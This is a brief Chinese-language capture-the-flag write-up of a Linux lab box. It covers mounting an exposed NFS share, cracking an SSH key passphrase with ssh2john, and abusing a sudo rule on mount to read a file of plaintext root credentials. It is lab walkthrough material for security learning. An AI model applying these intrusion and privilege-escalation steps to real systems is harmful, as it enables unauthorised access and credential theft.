nmap发现2049端口有nfs服务器
showmount -e 10.10.184.101
sudo mkdir /mnt/nfs
sudo mount -t nfs 10.10.184.101:/var/failsafe /mnt/nfs
|
进入目录拿到key pair
Public Key Pair: (23, 37627)
Private Key Pair: (61527, 37627)
|
进入网站解密
!(/z-img/Pasted image 20240403010022.PNG)
然后ssh2john爆破密码
得到wildflower (key)
chmod 600 key
有点问题,连接不上
直接wp了
sudo下有个(ALL : ALL) NOPASSWD: /bin/mount /dev/*
直接挂载
willow@willow-tree:~$ mkdir /home/willom/bcp/
willow@willow-tree:~$ sudo mount /dev/hidden_backup /home/willow/bcp/
willow@willow-tree:~$ ls -l /home/willow/bcp/
total 1
-rw-r--r-- 1 root root 42 Jan 30 15:19 creds.txt
willow@willow-tree:~$ cat /home/willow/bcp/creds.txt
root:7QvbvBTvwPspUK
willow:U0ZZJLGYhNAT2s
|
flag藏在图片里
